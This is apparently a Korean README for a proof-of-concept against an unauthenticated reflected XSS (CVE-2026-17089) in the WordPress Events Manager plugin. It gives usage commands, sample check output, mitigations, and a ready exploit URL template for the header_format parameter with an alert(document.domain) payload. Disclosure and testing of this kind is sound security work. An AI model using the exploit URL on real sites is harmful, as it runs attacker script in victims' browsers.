CVE-2026-17089에 대한 Shell PoC로, WordPress Events Manager 플러그인(<= 7.4.0.1)의 인증되지 않은 반사형 XSS 취약점입니다. 플러그인을 핑거프린팅하고 header_format 반사를 테스트합니다.
<= 7.4.0.1 — 인증되지 않은 반사형 XSS (header_format)작성자: pwnVader · 라이선스: MIT (저장소 루트)
| 구성 요소 | Events Manager – Calendar, Bookings, Tickets, and more! (WordPress 플러그인) |
| 유형 | CWE-79 — 반사형 크로스 사이트 스크립팅 |
| 영향 받는 버전 | <= 7.4.0.1 |
| 수정 버전 | 이후 7.4.x 릴리스 (EM_Events::output_grouped()에 wp_kses_post() 적용) |
| CVE | CVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |
| PoC | poc.sh |
숏코드 진입점은 wp_kses()로 header_format을 정제하지만, 인증되지 않은
AJAX 액션 search_events_grouped는 해당 정제를 우회하여 값을 HTML 응답에 그대로 출력합니다
(EM_Events::output_grouped()). 원격의 인증되지 않은 공격자는 해당 URL을 여는 모든 사용자의
영향 받는 사이트 오리진에서 임의의 JavaScript를 실행하는 URL을 만들 수 있습니다
(UI:R).
# Interactive menu
./poc.sh
# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com
# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"
check)== CVE-2026-17089 PoC (check) ==
target: https://example.com
[1] Plugin fingerprint (read-only)
[PASS] Events Manager assets are served (plugin installed)
[info] Stable tag: 7.1.7
[PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)
[2] Unauthenticated reflection test (read-only, benign marker)
[PASS] endpoint reflected header_format UNESCAPED (the raw is in the response)
== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).
https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>
readme.txt (Stable tag) 및/또는 플러그인 자산 경로
/wp-content/plugins/events-manager/includes/js/events-manager.js.admin-ajax.php?action=search_events_grouped에 header_format을 마커로 설정하여 전송하고,
원시 마크업이 응답 본문에 이스케이프되지 않고 반사되는지 확인합니다.header_format에 wp_kses_post()를 적용하여 모든 호출자를 커버합니다).search_events_grouped AJAX 액션을 차단하거나
WAF/애플리케이션 수준에서 header_format을 필터링하세요.승인된 보안 테스트 전용입니다. PoC는 읽기 전용(check)이거나 URL을 출력(url)합니다.
데이터는 수정되지 않습니다.